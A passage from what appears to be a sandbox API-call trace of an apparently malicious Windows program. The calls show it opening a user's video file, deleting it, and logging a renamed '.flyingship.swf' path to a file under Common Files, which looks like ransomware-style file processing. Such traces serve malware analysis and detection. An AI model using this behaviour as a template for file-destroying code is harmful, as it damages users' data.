lpsz="byte[83007]") returned 0xb [0197.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.563] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0197.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.563] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.563] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0197.563] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0197.564] FreeLibrary (hLibModule=0x75c90000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.565] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.565] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.565] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.566] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0197.566] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\93qz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0197.567] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.582] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.583] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.583] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0197.583] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.583] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.583] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.584] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.584] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0197.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.584] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.584] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.585] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", lpFilePart=0x0) returned 0x60 [0197.585] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x1aaead00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="93QZ.swf", cAlternateFileName="")) returned 0x90af58 [0197.585] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\93qz.swf")) returned 1 [0197.587] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x1aaead00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="93QZ.swf", cAlternateFileName="")) returned 0 [0197.587] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.590] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.591] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.591] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.591] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0197.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.593] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.594] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.594] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0197.594] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.594] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0197.596] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3a3b, lpOverlapped=0x0) returned 1 [0197.596] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0197.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3a3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\n", cchWideChar=110, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 110 [0197.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6e) returned 0x906f38 [0197.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\n", cchWideChar=110, lpMultiByteStr=0x906f38, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 110 [0197.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0197.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0197.597] WriteFile (in: hFile=0x158, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6d, lpNumberOfBytesWritten=0x87f43c, 